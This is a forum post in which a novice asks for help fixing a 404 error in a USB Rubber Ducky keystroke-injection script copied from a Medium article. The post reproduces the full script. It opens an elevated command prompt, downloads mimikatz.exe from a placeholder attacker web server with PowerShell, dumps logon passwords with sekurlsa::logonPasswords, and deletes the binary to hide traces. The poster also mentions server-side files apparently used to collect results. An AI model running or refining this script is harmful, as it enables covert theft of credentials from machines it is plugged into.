onrocketfalls Posted February 17, 2021 Posted February 17, 2021 I'm watching the command prompt as it runs and getting an error. Being a novice, I'm not totally sure what to make of it and was wondering if you guys could help me out. The error text is below: Exception calling "DownloadFile" with "2" argument(s): "The remote server returned an error: (404) Not Found." At line: 1 char: 1 (new-object System.Net.WebClient).DownloadFile('http://<my apache2 webserver ip>... CategoryInfo : NotSpecified: (:) [], MethodInvocationException FullyQualifiedErrorId : WebException The script that I'm running is the one found here (the one on the Hak5 website isn't able to even get to opening the cmd prompt for me but this one does): https://medium.com/@nickkwiecien/dump-passwords-in-15-seconds-with-a-rubber-ducky-82d5e7631d6f DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<replace me with webserver ip/host>/mimikatz.exe','%TEMP%\mimikatz.exe') DELAY 300 ENTER DELAY 3000 STRING %TEMP%\mimikatz.exe DELAY 300 ENTER DELAY 3000 STRING privilege::debug DELAY 300 ENTER DELAY 1000 STRING sekurlsa::logonPasswords full DELAY 300 ENTER DELAY 1000 STRING exit DELAY 300 ENTER DELAY 100 STRING del %TEMP%\mimikatz.exe DELAY 300 ENTER I've confirmed my apache server is up, and it is showing the im.ps1 and rx.php files. Yall have any ideas?
Recommended Posts
Archived
This topic is now archived and is closed to further replies.